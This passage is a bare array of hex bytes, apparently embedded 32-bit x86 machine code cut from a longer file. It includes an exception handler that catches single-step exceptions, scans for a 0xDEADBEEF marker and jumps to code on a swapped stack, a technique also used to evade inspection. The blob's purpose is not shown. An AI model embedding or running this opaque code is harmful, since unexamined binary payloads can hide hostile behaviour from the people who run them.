5,0x10,0x8B,0x50,0x24,0x8B,0x45,0x10,0x89,0x50,0x28,0x8B,0x45,0x10,0x8B,0x50,0x24,0x8B,0x45,0xF8,0x8B,0x80,0x1C,0x05,0x00,0x00,0xB9,0x04,0x00,0x00,0x00,0x29,0xC1,0x01,0xCA,0x8B,0x45,0x10,0x89,0x50,0x24,0x8B,0x45,0x10,0x8B,0x40,0x24,0x8B,0x55,0xF8,0x8B,0x92,0x24,0x05,0x00,0x00,0x89,0x10,0xEB,0x01,0x90,0x83,0x45,0xFC,0x01,0x8B,0x45,0xFC,0x3B,0x45,0x0C,0x0F,0x82,0x67,0xFF,0xFF,0xFF,0x90,0x90,0xC9,0xC3,0x8B,0x04,0x24,0xC3,0x90,0x0F,0x0B,0x8D,0x44,0x24,0x04,0xC3,0x90,0x0F,0x0B,0xB8,0x18,0x00,0x00,0x00,0x64,0x8B,0x00,0xC3,0x90,0x0F,0x0B,0x55,0x89,0xE5,0x57,0x56,0x53,0x81,0xEC,0x8C,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xB4,0x00,0x00,0x00,0x00,0xC7,0x45,0x8C,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0xC7,0x45,0xAC,0x00,0x00,0x00,0x00,0xC7,0x45,0xA0,0x00,0x00,0x00,0x00,0xC7,0x45,0xA4,0x00,0x00,0x00,0x00,0xC7,0x45,0x9C,0x07,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0x98,0x00,0x00,0x00,0x00,0xC7,0x45,0x94,0x04,0x00,0x00,0x00,0xC7,0x45,0x90,0xEF,0xBE,0xAD,0xDE,0xE8,0x6C,0xFF,0xFF,0xFF,0x89,0x45,0x98,0x8B,0x45,0x98,0x8B,0x40,0x08,0x89,0x45,0xAC,0x8B,0x45,0x98,0x8B,0x40,0x04,0x89,0xC1,0x8B,0x45,0x98,0x8B,0x40,0x08,0x89,0xC2,0x89,0xC8,0x29,0xD0,0x89,0x45,0xA0,0xC7,0x45,0xA4,0x00,0x00,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0xC7,0x44,0x24,0x08,0xE8,0xDA,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xB4,0x83,0x7D,0xB4,0x00,0x0F,0x84,0x9E,0x03,0x00,0x00,0x81,0x7D,0x0C,0x0F,0x2A,0x9B,0xCD,0x75,0x14,0x8D,0x45,0x8C,0x89,0x44,0x24,0x04,0x8B,0x45,0xB4,0x89,0x04,0x24,0xE8,0x55,0xF8,0xFF,0xFF,0xEB,0x13,0x8D,0x45,0x8C,0x89,0x44,0x24,0x04,0x8B,0x45,0xB4,0x89,0x04,0x24,0xE8,0x3D,0xF9,0xFF,0xFF,0x90,0x8B,0x45,0x8C,0x83,0xF8,0x1E,0x76,0x1D,0xC7,0x04,0x24,0xF4,0xE0,0x48,0x65,0xE8,0x89,0x1A,0x00,0x00,0xC7,0x04,0x24,0x05,0xE1,0x48,0x65,0xE8,0x7D,0x1A,0x00,0x00,0xE9,0x53,0x03,0x00,0x00,0x8B,0x45,0x8C,0x89,0x44,0x24,0x04,0x8B,0x45,0xB4,0x89,0x04,0x24,0xE8,0x12,0xFD,0xFF,0xFF,0x8B,0x45,0x94,0x0F,0xAF,0x45,0x9C,0x89,0xC3,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xC8,0x83,0x7D,0xC8,0x00,0x0F,0x84,0x04,0x03,0x00,0x00,0x8B,0x45,0x94,0xBA,0x00,0x00,0x00,0x00,0x01,0x45,0xD8,0x11,0x55,0xDC,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xEB,0x3B,0x8B,0x45,0xC4,0x69,0xD0,0x4C,0x07,0x00,0x00,0x8B,0x45,0xB4,0x01,0xD0,0x8B,0x80,0x38,0x07,0x00,0x00,0x85,0xC0,0x74,0x1F,0x8B,0x45,0xC4,0x69,0xD0,0x4C,0x07,0x00,0x00,0x8B,0x45,0xB4,0x01,0xD0,0x8B,0x80,0x1C,0x05,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x01,0x45,0xD8,0x11,0x55,0xDC,0x83,0x45,0xC4,0x01,0x8B,0x55,0xC4,0x8B,0x45,0x8C,0x39,0xC2,0x72,0xBB,0x8B,0x45,0x94,0xBA,0x00,0x00,0x00,0x00,0x01,0x45,0xD8,0x11,0x55,0xDC,0x8B,0x45,0x94,0xBA,0x00,0x00,0x00,0x00,0x01,0x45,0xD8,0x11,0x55,0xDC,0x8B,0x45,0x94,0xBA,0x00,0x00,0x00,0x00,0x23,0x45,0xD8,0x23,0x55,0xDC,0x8B,0x4D,0x94,0xBB,0x00,0x00,0x00,0x00,0x89,0x45,0x84,0x89,0xCF,0x89,0xD6,0x89,0xDA,0x8B,0x45,0x84,0x31,0xF8,0x31,0xF2,0x09,0xD0,0x75,0x0A,0x8B,0x45,0x94,0x01,0xC0,0x89,0x45,0xCC,0xEB,0x06,0x8B,0x45,0x94,0x89,0x45,0xCC,0x8B,0x45,0xCC,0xBA,0x00,0x00,0x00,0x00,0x01,0x45,0xD8,0x11,0x55,0xDC,0x8B,0x5D,0xD8,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xD0,0x83,0x7D,0xD0,0x00,0x0F,0x84,0x17,0x02,0x00,0x00,0x8B,0x5D,0xA0,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xD4,0x83,0x7D,0xD4,0x00,0x0F,0x84,0xEA,0x01,0x00,0x00,0x8B,0x55,0xA0,0x8B,0x45,0xAC,0x01,0xC2,0x8B,0x45,0xD8,0x29,0xC2,0x89,0x55,0xB0,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0xEB,0x50,0x8B,0x45,0xC0,0x69,0xD0,0x4C,0x07,0x00,0x00,0x8B,0x45,0xB4,0x01,0xD0,0x8B,0x80,0x38,0x07,0x00,0x00,0x85,0xC0,0x74,0x34,0x8B,0x45,0xC0,0x69,0xD0,0x4C,0x07,0x00,0x00,0x8B,0x45,0xB4,0x01,0xD0,0x8B,0x80,0x24,0x05,0x00,0x00,0x85,0xC0,0x74,0x1C,0x8B,0x45,0xC0,0x69,0xD0,0x4C,0x07,0x00,0x00,0x8B,0x45,0xB4,0x01,0xD0,0x8B,0x90,0x24,0x05,0x00,0x00,0x8B,0x45,0x08,0x89,0x50,0x30,0xEB,0x0E,0x83,0x45,0xC0,0x01,0x8B,0x55,0xC0,0x8B,0x45,0x8C,0x39,0xC2,0x72,0xA6,0x8B,0x45,0x08,0x8B,0x55,0xAC,0x89,0x10,0x8B,0x4D,0x08,0x8B,0x45,0xA0,0x8B,0x55,0xA4,0x89,0x41,0x08,0x89,0x51,0x0C,0x8B,0x45,0x08,0x8B,0x55,0xD4,0x89,0x50,0x10,0x8B,0x45,0x08,0x8B,0x55,0xD0,0x89,0x50,0x14,0x8B,0x4D,0x08,0x8B,0x45,0xD8,0x8B,0x55,0xDC,0x89,0x41,0x18,0x89,0x51,0x1C,0x8B,0x45,0x08,0x8B,0x55,0xB0,0x89,0x50,0x20,0x8B,0x45,0x08,0x8B,0x40,0x14,0x89,0xC1,0x8B,0x45,0x08,0x8B,0x50,0x1C,0x8B,0x40,0x18,0x01,0xC8,0x89,0xC2,0x8B,0x45,0x08,0x89,0x50,0x24,0x8B,0x45,0x08,0x8B,0x55,0xC8,0x89,0x50,0x34,0x8B,0x45,0x08,0x8B,0x40,0x24,0x2B,0x45,0xCC,0x89,0xC2,0x8B,0x45,0x08,0x89,0x50,0x24,0x8B,0x45,0x08,0x8B,0x40,0x24,0x2B,0x45,0x94,0x89,0xC2,0x8B,0x45,0x08,0x89,0x50,0x24,0x8B,0x45,0x08,0x8B,0x40,0x24,0x8B,0x55,0xC8,0x89,0x10,0x8B,0x45,0x08,0x8B,0x40,0x24,0x2B,0x45,0x94,0x89,0xC2,0x8B,0x45,0x08,0x89,0x50,0x24,0x8B,0x45,0x08,0x8B,0x40,0x24,0x8B,0x55,0x90,0x89,0x10,0x8B,0x45,0x08,0x8B,0x50,0x24,0x8B,0x45,0x08,0x89,0x50,0x2C,0x8B,0x45,0x8C,0x8B,0x55,0x08,0x89,0x54,0x24,0x08,0x89,0x44,0x24,0x04,0x8B,0x45,0xB4,0x89,0x04,0x24,0xE8,0x2C,0xFB,0xFF,0xFF,0x8B,0x45,0x08,0x8B,0x40,0x24,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x31,0xF2,0xFF,0xFF,0x8B,0x55,0x08,0x89,0x42,0x24,0x8B,0x45,0x08,0x8B,0x40,0x28,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x16,0xF2,0xFF,0xFF,0x8B,0x55,0x08,0x89,0x42,0x28,0x8B,0x45,0x08,0x8B,0x40,0x2C,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xFB,0xF1,0xFF,0xFF,0x8B,0x55,0x08,0x89,0x42,0x2C,0xC7,0x45,0xBC,0x01,0x00,0x00,0x00,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0xEB,0x27,0x8B,0x45,0xB8,0x69,0xD0,0x4C,0x07,0x00,0x00,0x8B,0x45,0xB4,0x01,0xD0,0x8B,0x80,0x38,0x07,0x00,0x00,0x85,0xC0,0x74,0x0B,0x83,0x7D,0xBC,0x00,0xC7,0x45,0xBC,0x00,0x00,0x00,0x00,0x83,0x45,0xB8,0x01,0x8B,0x55,0xB8,0x8B,0x45,0x8C,0x39,0xC2,0x72,0xCF,0xC7,0x45,0xE4,0x01,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xE4,0x00,0x75,0x29,0x83,0x7D,0xD0,0x00,0x74,0x23,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xD0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x83,0x7D,0xE4,0x00,0x75,0x29,0x83,0x7D,0xD4,0x00,0x74,0x23,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xD4,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x83,0x7D,0xE4,0x00,0x75,0x29,0x83,0x7D,0xC8,0x00,0x74,0x23,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xC8,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x83,0x7D,0xB4,0x00,0x74,0x23,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xB4,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x8B,0x45,0xE4,0x8D,0x65,0xF4,0x5B,0x5E,0x5F,0x5D,0xC3,0x8B,0x4C,0x24,0x04,0x31,0xC0,0x8B,0x51,0x04,0x8B,0x79,0x08,0x8B,0x31,0x8A,0x1C,0x06,0x88,0x1C,0x07,0x40,0x39,0xD0,0x75,0xF5,0x31,0xC0,0x8B,0x71,0x0C,0x8B,0x79,0x14,0x8B,0x51,0x10,0x8A,0x1C,0x06,0x88,0x1C,0x07,0x40,0x39,0xD0,0x75,0xF5,0x8B,0x41,0x20,0x8B,0x40,0x04,0x8B,0x51,0x04,0x89,0x10,0x8B,0x51,0x08,0x89,0x50,0x04,0x8B,0x11,0x89,0x50,0x08,0x89,0x58,0x0C,0x89,0x68,0x10,0x5A,0x89,0x60,0x14,0x89,0x50,0x18,0x8B,0x41,0x34,0x8B,0x69,0x18,0x8B,0x51,0x2C,0x83,0xFA,0x00,0x75,0x20,0x8B,0x55,0x00,0x89,0x55,0x04,0x8B,0x51,0x24,0x83,0xC2,0x02,0x89,0x55,0x00,0x83,0xC5,0x04,0x8B,0x51,0x30,0x83,0xFA,0x00,0x74,0x06,0x8B,0x55,0x00,0x89,0x55,0xFC,0x83,0xF8,0x01,0x7C,0x0B,0x8B,0x5C,0x81,0x34,0x89,0x5C,0x85,0x00,0x48,0xEB,0xF0,0x8B,0x61,0x18,0x8B,0x69,0x1C,0x8B,0x41,0x28,0x8B,0x59,0x24,0x89,0xE2,0xFF,0xE3,0x90,0x0F,0x0B,0x55,0x89,0xE5,0x57,0x53,0x83,0xEC,0x70,0xC7,0x45,0xF4,0x01,0x00,0x00,0xC0,0x8D,0x55,0xA0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x0E,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0x9C,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x8D,0x45,0x10,0x89,0x45,0x98,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x81,0x6A,0x00,0x00,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x0F,0x84,0x63,0x01,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x18,0x6A,0x00,0x00,0x89,0x45,0xE0,0x83,0x7D,0xE0,0x00,0x0F,0x84,0x4E,0x01,0x00,0x00,0x8B,0x45,0x08,0x89,0x44,0x24,0x04,0x8D,0x45,0xA0,0x89,0x04,0x24,0xE8,0x7F,0xF9,0xFF,0xFF,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x0F,0x84,0x32,0x01,0x00,0x00,0x8B,0x45,0xD0,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x75,0x09,0x8B,0x45,0xE4,0x83,0xC0,0x02,0x89,0x45,0xF0,0x8D,0x45,0x9C,0x89,0x44,0x24,0x04,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x01,0x06,0x00,0x00,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x0F,0x84,0x01,0x01,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0xC7,0x44,0x24,0x08,0x60,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xD3,0x00,0x00,0x00,0x8B,0x55,0xA0,0x8B,0x45,0xEC,0x89,0x10,0x8B,0x45,0xA8,0x8B,0x55,0xAC,0x89,0xC2,0x8B,0x45,0xEC,0x89,0x50,0x04,0x8B,0x55,0xB0,0x8B,0x45,0xEC,0x89,0x50,0x08,0x8B,0x55,0xB4,0x8B,0x45,0xEC,0x89,0x50,0x0C,0x8B,0x45,0xB8,0x8B,0x55,0xBC,0x89,0xC2,0x8B,0x45,0xEC,0x89,0x50,0x10,0x8B,0x55,0xC0,0x8B,0x45,0xEC,0x89,0x50,0x14,0x8B,0x55,0xC4,0x8B,0x45,0xEC,0x89,0x50,0x18,0x8B,0x55,0xC8,0x8B,0x45,0xEC,0x89,0x50,0x1C,0x8B,0x55,0xCC,0x8B,0x45,0xEC,0x89,0x50,0x20,0x8B,0x45,0xEC,0xC7,0x40,0x2C,0x00,0x00,0x00,0x00,0xE8,0xD0,0x69,0x00,0x00,0x8B,0x55,0xEC,0x89,0x42,0x30,0x8B,0x45,0xEC,0x8B,0x55,0xE4,0x89,0x50,0x24,0x8B,0x45,0xEC,0x8B,0x55,0xE0,0x89,0x50,0x28,0x8B,0x45,0xEC,0x8B,0x55,0x0C,0x89,0x50,0x34,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xEB,0x1C,0x8B,0x45,0x98,0x8D,0x50,0x04,0x89,0x55,0x98,0x8B,0x10,0x8B,0x45,0xEC,0x8B,0x4D,0xE8,0x83,0xC1,0x0C,0x89,0x54,0x88,0x08,0x83,0x45,0xE8,0x01,0x8B,0x45,0xE8,0x3B,0x45,0x0C,0x72,0xDC,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0x97,0xFD,0xFF,0xFF,0x89,0x45,0xF4,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xEC,0x00,0x74,0x23,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xEC,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x8B,0x45,0xB0,0x85,0xC0,0x74,0x23,0x8B,0x5D,0xB0,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x8B,0x45,0xB4,0x85,0xC0,0x74,0x23,0x8B,0x5D,0xB4,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x8B,0x45,0xD4,0x85,0xC0,0x74,0x23,0x8B,0x5D,0xD4,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x8B,0x45,0x9C,0x85,0xC0,0x74,0x0B,0x8B,0x45,0x9C,0x89,0x04,0x24,0xE8,0x6F,0x05,0x00,0x00,0x8B,0x45,0xF4,0x8D,0x65,0xF8,0x5B,0x5F,0x5D,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x48,0xC7,0x45,0xF0,0x01,0x00,0x00,0xC0,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0xC7,0x44,0x24,0x08,0x04,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xEC,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0xC7,0x44,0x24,0x08,0x18,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xE8,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0xC7,0x44,0x24,0x08,0x08,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xE4,0x83,0x7D,0xEC,0x00,0x74,0x0C,0x83,0x7D,0xE8,0x00,0x74,0x06,0x83,0x7D,0xE4,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x81,0x01,0x00,0x00,0x8B,0x45,0xEC,0xC7,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0xE8,0xC7,0x00,0x18,0x00,0x00,0x00,0x8B,0x45,0xE8,0xC7,0x40,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xE8,0x8B,0x55,0x10,0x89,0x50,0x0C,0x8B,0x45,0xE8,0xC7,0x40,0x08,0x00,0x00,0x00,0x00,0x8B,0x45,0xE8,0xC7,0x40,0x10,0x00,0x00,0x00,0x00,0x8B,0x45,0xE8,0xC7,0x40,0x14,0x00,0x00,0x00,0x00,0x8B,0x55,0x08,0x8B,0x45,0xE4,0x89,0x10,0x8B,0x45,0xE4,0xC7,0x40,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xE4,0x89,0x44,0x24,0x14,0x8B,0x45,0xE8,0x89,0x44,0x24,0x10,0x8B,0x45,0x0C,0x89,0x44,0x24,0x0C,0x8B,0x45,0xEC,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x04,0x00,0x00,0x00,0xC7,0x04,0x24,0x0F,0x2A,0x9B,0xCD,0xE8,0x3B,0xFC,0xFF,0xFF,0x89,0x45,0xF0,0x8B,0x45,0xEC,0x8B,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF0,0x00,0x79,0x07,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x83,0x7D,0xEC,0x00,0x74,0x45,0xC7,0x44,0x24,0x08,0x04,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0xAF,0xA3,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xEC,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x83,0x7D,0xE8,0x00,0x74,0x45,0xC7,0x44,0x24,0x08,0x18,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xE8,0x89,0x04,0x24,0xE8,0x64,0xA3,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xE8,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x83,0x7D,0xE4,0x00,0x74,0x45,0xC7,0x44,0x24,0x08,0x08,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xE4,0x89,0x04,0x24,0xE8,0x19,0xA3,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xE4,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0xC9,0xC3,0x90,0x90,0x55,0x89,0xE5,0x53,0x83,0xEC,0x10,0x8B,0x45,0x10,0xBA,0x01,0x00,0x00,0x00,0x89,0xC1,0xD3,0xE2,0x89,0xD0,0x83,0xE8,0x01,0x89,0x45,0xF8,0x8B,0x45,0x0C,0x8B,0x55,0xF8,0x89,0xC1,0xD3,0xE2,0x89,0xD0,0xF7,0xD0,0x23,0x45,0x08,0x89,0xC2,0x8B,0x45,0x0C,0x8B,0x5D,0x14,0x89,0xC1,0xD3,0xE3,0x89,0xD8,0x09,0xD0,0x89,0x45,0x08,0x8B,0x45,0x08,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x10,0x83,0x7D,0x0C,0x03,0x74,0x44,0x83,0x7D,0x0C,0x03,0x7F,0x49,0x83,0x7D,0x0C,0x02,0x74,0x2C,0x83,0x7D,0x0C,0x02,0x7F,0x3D,0x83,0x7D,0x0C,0x00,0x74,0x08,0x83,0x7D,0x0C,0x01,0x74,0x0E,0xEB,0x2F,0x8B,0x45,0x08,0xC7,0x40,0x04,0x00,0x00,0x00,0x00,0xEB,0x23,0x8B,0x45,0x08,0xC7,0x40,0x08,0x00,0x00,0x00,0x00,0xEB,0x17,0x8B,0x45,0x08,0xC7,0x40,0x0C,0x00,0x00,0x00,0x00,0xEB,0x0B,0x8B,0x45,0x08,0xC7,0x40,0x10,0x00,0x00,0x00,0x00,0x90,0x8B,0x45,0x0C,0x8D,0x14,0x00,0x8B,0x45,0x08,0x8B,0x40,0x18,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x01,0x00,0x00,0x00,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x36,0xFF,0xFF,0xFF,0x8B,0x55,0x08,0x89,0x42,0x18,0x8B,0x45,0x08,0xC7,0x40,0x14,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0xC7,0x80,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x90,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x10,0x83,0x7D,0x10,0x03,0x74,0x41,0x83,0x7D,0x10,0x03,0x7F,0x45,0x83,0x7D,0x10,0x02,0x74,0x2A,0x83,0x7D,0x10,0x02,0x7F,0x39,0x83,0x7D,0x10,0x00,0x74,0x08,0x83,0x7D,0x10,0x01,0x74,0x0D,0xEB,0x2B,0x8B,0x55,0x0C,0x8B,0x45,0x08,0x89,0x50,0x04,0xEB,0x20,0x8B,0x55,0x0C,0x8B,0x45,0x08,0x89,0x50,0x08,0xEB,0x15,0x8B,0x55,0x0C,0x8B,0x45,0x08,0x89,0x50,0x0C,0xEB,0x0A,0x8B,0x55,0x0C,0x8B,0x45,0x08,0x89,0x50,0x10,0x90,0x8B,0x45,0x08,0x8B,0x40,0x18,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x10,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x10,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x99,0xFE,0xFF,0xFF,0x8B,0x55,0x08,0x89,0x42,0x18,0x8B,0x45,0x10,0x8D,0x14,0x00,0x8B,0x45,0x08,0x8B,0x40,0x18,0xC7,0x44,0x24,0x0C,0x01,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x01,0x00,0x00,0x00,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x6B,0xFE,0xFF,0xFF,0x8B,0x55,0x08,0x89,0x42,0x18,0x8B,0x45,0x08,0xC7,0x40,0x14,0x00,0x00,0x00,0x00,0x90,0xC9,0xC3,0x8B,0x4C,0x24,0x04,0x8B,0x01,0x8B,0x00,0x3D,0x04,0x00,0x00,0x80,0x75,0x42,0x8B,0x49,0x04,0x8B,0x81,0xB0,0x00,0x00,0x00,0x8B,0xB9,0xC4,0x00,0x00,0x00,0xBE,0xEF,0xBE,0xAD,0xDE,0x83,0xC7,0x04,0x39,0x37,0x75,0xF9,0x8B,0x7F,0x04,0x8B,0x0F,0x8B,0x77,0x04,0x8B,0x57,0x08,0x8A,0x5C,0x0E,0xFF,0x88,0x5C,0x0A,0xFF,0x49,0x83,0xF9,0x00,0x75,0xF2,0x8B,0x5F,0x0C,0x8B,0x6F,0x10,0x8B,0x67,0x14,0x8B,0x7F,0x18,0xFF,0xE7,0xB8,0xFF,0xFF,0xFF,0xFF,0xC3,0x90,0x0F,0x0B,0x55,0x89,0xE5,0x57,0x81,0xEC,0xF4,0x02,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x01,0x00,0x00,0xC0,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x8D,0x95,0x1C,0xFD,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0xB3,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0xC7,0x44,0x24,0x08,0xCC,0x02,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8D,0x85,0x1C,0xFD